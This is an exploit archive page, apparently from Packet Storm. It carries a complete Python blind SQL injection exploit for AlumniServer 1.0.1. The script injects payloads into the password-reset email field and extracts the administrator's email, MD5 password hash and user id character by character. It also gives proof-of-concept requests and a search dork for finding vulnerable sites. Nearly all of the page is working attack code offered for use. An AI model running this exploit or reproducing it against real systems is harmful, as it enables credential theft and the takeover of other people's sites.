what you don't know can hurt you

AlumniServer 1.0.1 Blind SQL Injection

AlumniServer 1.0.1 Blind SQL Injection
Posted Jun 25, 2009
Authored by YEnH4ckEr

Blind SQL injection exploit for AlumniServer version 1.0.1.

tags | exploit, sql injection
MD5 | 862c705609e956d837fc25a2d8431f4a

AlumniServer 1.0.1 Blind SQL Injection

Change Mirror Download
#!/usr/bin/python
#--------------------------------------------------------------------------------
#(POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.alumniserver.net/
#-->DOWNLOAD: http://www.alumniserver.net/
#-->DEMO: N/A
#-->CATEGORY: CMS/Education
#-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
# and companies. Services for usersinclude profile page,...
#-->RELEASED: 2009-06-11
#
#CMS VULNERABILITY:
#
#-->TESTED ON: Python 2.6
#-->DORK: "AlumniServer project"
#-->CATEGORY: BSQLi PYTHON EXPLOIT
#-->AFFECT VERSION: CURRENT
#-->Discovered Bug date: 2009-06-15
#-->Reported Bug date: 2009-06-15
#-->Fixed bug date: N/A
#-->Info patch (????): N/A
#-->Author: YEnH4ckEr
#-->mail: y3nh4ck3r[at]gmail[dot]com
#-->WEB/BLOG: N/A
#-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
#-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
#
#------------
#CONDITIONS:
#------------
#
#magic quotes=OFF
#
#--------
#NEEDED:
#--------
#
#Valid email
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#POST http://[HOST]/[PATH]/Password.php HTTP/1.1
#Host: [HOST]
#Referer: http://[HOST]/[PATH]/Password.php
#Content-Type: application/x-www-form-urlencoded
#
#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE
#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE
#
#Other P0C (with a registered user):
#
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
#
#--------------
#WATCH VIDEOS
#--------------
#
# BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw
#
# AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0
#
#
#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
#
#Used modules
import urllib2,sys,re,os
#Defined functions
def init():
if(sys.platform=='win32'):
os.system("cls")
os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
os.system ("color 02")
else:
os.system("clear")

print "\t#######################################################\n\n"
print "\t#######################################################\n\n"
print "\t## AlumniServer v-1.0.1 Blind SQLi Exploit ##\n\n"
print "\t## ++Conditions: magic_quotes=OFF ##\n\n"
print "\t## ++Needed: Valid mail ##\n\n"
print "\t## Author: Y3nh4ck3r ##\n\n"
print "\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n"
print "\t## Proud to be Spanish! ##\n\n"
print "\t#######################################################\n\n"
print "\t#######################################################\n\n"

def request(urltarget,postmsg):
req=urllib2.Request(url=urltarget,data=postmsg)
conn = urllib2.urlopen(req)
outcode=conn.read()
#print outcode #--> Active this line for debugger mode
return outcode

def error():
print "\t------------------------------------------------------------\n"
print "\tWeb isn't vulnerable!\n\n"
print "\t--->Maybe:\n\n"
print "\t\t1.-Patched.\n"
print "\t\t2.-Bad path or host.\n"
print "\t\t3.-Bad mail.\n"
print "\t\t4.-Magic quotes ON.\n"
print "\t\tEXPLOIT FAILED!\n"
print "\t------------------------------------------------------------\n"
sys.exit()

def testedblindsql():
print "\t-----------------------------------------------------------------\n"
print "\tWEB MAYBE BE VULNERABLE!\n\n"
print "\tTested Blind SQL Injection.\n"
print "\tStarting exploit...\n"
print "\t-----------------------------------------------------------------\n\n"

def helper(filename):
print "\n\t[!!!] AlumniServer v-1.0.1 Blind SQL Injection Exploit\n"
print "\t[!!!] USAGE MODE: [!!!]\n"
print "\t[!!!] python "+filename+" [HOST] [PATH] [MAIL] [ID_ADMIN/HIDDEN/BRUTEFORCEID]\n"
print "\t[!!!] [HOST]: Web.\n"
print "\t[!!!] [PATH]: Home Path.\n"
print "\t[!!!] [MAIL]: Mail for fish\n"
print "\t[!!!] [ID_ADMIN/HIDDEN/BRUTEFORCEID]: Id_admin if we are registered users or 'hidden' value if admin is hidden.\n"
print "\t[!!!] Also can use 'bruteforceid' value for bruteforce admin id previously.\n"
print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a\n"
print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden\n"
print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid\n"
sys.exit()

def brute_length(urlrequest, idadmin, mail):
#Username length
flag=1
i=0
while(flag==1):
i=i+1
if(idadmin=="hidden"):
blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+hideuser='y')='"+str(i) #injected code
else:
blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+id='"+idadmin+"')='"+str(i) #injected code
output=request(urlrequest, blindsql)
if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
flag=2
else:
flag=1
#This is the max length of email
if (i>50):
error()
#Save column length
length=i
print "\t<<<<<--------------------------------------------------------->>>>>\n"
print "\tLength catched!\n"
print "\tLength E-mail --> "+str(length)+"\n"
print "\tWait several minutes...\n"
print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
return length
def exploiting (lengthvalue, urlrequest, column, idadmin, mail):
#Bruteforcing values
values=""
k=1
z=32
while((k<=lengthvalue) and (z<=126)):
#Choose method, hidden or with id
if(idadmin=="hidden"):
blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+hideuser='y'),"+str(k)+",1))='"+str(z) #injected code
else:
blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+id='"+idadmin+"'),"+str(k)+",1))='"+str(z) #injected code
output=request(urlrequest, blindsql)
if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
values=values+chr(z)
k=k+1
z=32
#new char
z=z+1
return values

def exploiting_id (urlrequest, mail):
#Bruteforcing values
values=""
#Possible values of id
arrayids=[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f']
k=1
#Max length of id = 12
while(k<=12):
for z in arrayids:
blindsql="resetpwemail="+mail+"'+AND+substring((SELECT+id+FROM+as_users+HAVING+MIN(membersince)),"+str(k)+",1)='"+str(z) #injected code
output=request(urlrequest, blindsql)
if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
values=values+str(z)
k=k+1
z='g'
return values
#Main
init()
#Init variables
if(len(sys.argv) <= 4):
helper(sys.argv[0])

host=sys.argv[1]
path=sys.argv[2]
mail=sys.argv[3]
#Define mode: ID, hidden or bruteforceid
if(sys.argv[4]=="hidden"):
mode="hidden"
elif(sys.argv[4]=="bruteforceid"):
mode="bruteforceid"
else:
mode="usual"
idadmin=sys.argv[4]

finalrequest="http://"+host+"/"+path+"/Password.php"
testblind1="resetpwemail="+mail+"%27+and+1%3D%271" #Return true
outcode1=request(finalrequest,testblind1)
testblind2="resetpwemail="+mail+"%27+and+1%3D%270" #Return false
outcode2=request(finalrequest,testblind2)
#Check BSQLi
if(outcode1==outcode2):
error()
else:
testedblindsql()
if(mode=="usual"):
#Catching length of admin email
lengthadmin=brute_length(finalrequest, idadmin, mail)
mailadmin=exploiting(lengthadmin, finalrequest, "email", idadmin, mail)
#Catching value of password (hashed md5)
passwordhash=exploiting(32, finalrequest, "password", idadmin, mail)
elif(mode=="hidden"):
#Catching length of admin email
lengthadmin=brute_length(finalrequest, "hidden", mail)
mailadmin=exploiting(lengthadmin, finalrequest, "email", "hidden", mail)
#Catching value of password (hashed md5)
passwordhash=exploiting(32, finalrequest, "password", "hidden", mail)
else:
print "\t<<<<<--------------------------------------------------------->>>>>\n"
print "\tBruteforcing id. Wait a few minutes...\n"
print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
#Catching value of admin id
idadmin=exploiting_id(finalrequest, mail)

print "\n\t\t*************************************************\n"
print "\t\t********* EXPLOIT EXECUTED SUCCESSFULLY ********\n"
print "\t\t*************************************************\n\n"
#Mode usual and hidden
if((mode=="usual") or (mode=="hidden")):
print "\t\tAdmin-mail: "+mailadmin+"\n\n"
print "\t\tPassword hash: "+passwordhash+"\n\n"
else:
#Mode bruteforceid
print "\t\tAdmin-id: "+idadmin+"\n\n"
print "\n\t\t<<----------------------FINISH!-------------------->>\n\n"
print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n"
print "\t\t<<------------------------EOF---------------------->>\n\n"
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close